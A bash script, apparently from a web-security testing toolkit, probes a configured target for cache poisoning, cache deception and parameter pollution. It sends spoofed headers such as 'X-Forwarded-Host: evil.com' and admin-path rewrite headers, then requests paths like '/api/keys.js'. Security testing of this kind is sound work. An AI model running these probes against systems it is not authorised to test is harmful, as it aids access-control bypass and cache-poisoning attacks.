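#!/bin/bash
# Web cache poisoning + cache deception
#
# Sends a fixed set of GET requests to $TARGET (from config.sh) and records,
# for each, the HTTP status code and - for the unkeyed-header checks - whether
# the marker value carried in the injected header is reflected in the body.
# Every result line goes to stdout and to $OUT/cache_poison/summary.txt, and
# the whole summary is printed again at the end.
#
# Requires config.sh to set:
#   TARGET - base URL of the host under test
#   OUT    - base output directory
set -o pipefail   # deliberately no -e: a failed/timed-out curl is logged as [000], not fatal

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
# shellcheck source=../config.sh
source "$SCRIPT_DIR/../config.sh"

# Fail early and loudly if config.sh did not provide what we need; otherwise an
# unset OUT would create /cache_poison at the filesystem root.
: "${TARGET:?config.sh must set TARGET}"
: "${OUT:?config.sh must set OUT}"
set -u

TARGET=${TARGET%/}   # paths below are appended with a leading '/', avoid '//'
OUT="$OUT/cache_poison"
mkdir -p -- "$OUT" || exit 1
readonly SUMMARY="$OUT/summary.txt"
readonly CURL_TIMEOUT=10

#######################################
# Print a line to stdout and append it to the summary file.
# Globals:   SUMMARY (read)
# Arguments: $* - text to log (may be empty for a blank separator line)
#######################################
log() {
  printf '%s\n' "$*" | tee -a -- "$SUMMARY"
}

#######################################
# GET a URL and print only the HTTP status code ("000" on transport failure).
# Globals:   CURL_TIMEOUT (read)
# Arguments: $1 - URL to request
#            $2 - file to write the response body to (/dev/null to discard)
#            $3.. - extra curl arguments (e.g. -H 'Name: value')
# Outputs:   three-digit status code on stdout
#######################################
probe() {
  local url=$1 body=$2
  shift 2
  curl -sk -o "$body" -w '%{http_code}' --max-time "$CURL_TIMEOUT" "$@" "$url"
}

: > "$SUMMARY"   # fresh summary on every run
log '=== CACHE POISONING TESTS ==='

# Unkeyed header injection: each header carries a marker value; seeing that
# marker in the response body means the server reflects a header that a cache
# normally does not key on.
log '--- Unkeyed Header Cache Poison ---'
POISON_HEADERS=(
  'X-Forwarded-Host: evil.com'
  'X-Forwarded-Scheme: http'
  'X-Forwarded-Proto: http'
  'X-Original-URL: /admin'
  'X-Rewrite-URL: /admin'
  'X-Custom-IP-Authorization: 127.0.0.1'
)
body_file="$OUT/poison_body.txt"
for hdr in "${POISON_HEADERS[@]}"; do
  # A failed request leaves no new body; drop the previous one so the
  # reflection check below cannot report a stale hit for this header.
  rm -f -- "$body_file"
  code=$(probe "$TARGET/" "$body_file" -H "$hdr")
  reflected=
  if [[ -s "$body_file" ]]; then
    # -F: match the markers literally ('.' must not match any byte).
    reflected=$(grep -i -F -e 'evil.com' -e '127.0.0.1' -- "$body_file" | head -n 1)
  fi
  log "[$code] $hdr | reflected: ${reflected:-none}"
done

# Cache deception - append .css/.js to authenticated paths
log ''
log '--- Cache Deception ---'
DECEPTION_PATHS=('/admin/index.php/.css' '/api/keys.js' '/user/profile.png' '/account.css')
for p in "${DECEPTION_PATHS[@]}"; do
  code=$(probe "$TARGET$p" /dev/null)
  log "[$code] $p"
done

# Parameter pollution
log ''
log '--- Parameter Pollution ---'
code=$(probe "$TARGET/?foo=bar&foo=baz" /dev/null)
log "[$code] Duplicate param ?foo=bar&foo=baz"
code=$(probe "$TARGET/?cb=$(date +%s)" /dev/null)
log "[$code] Cache buster param"

cat -- "$SUMMARY"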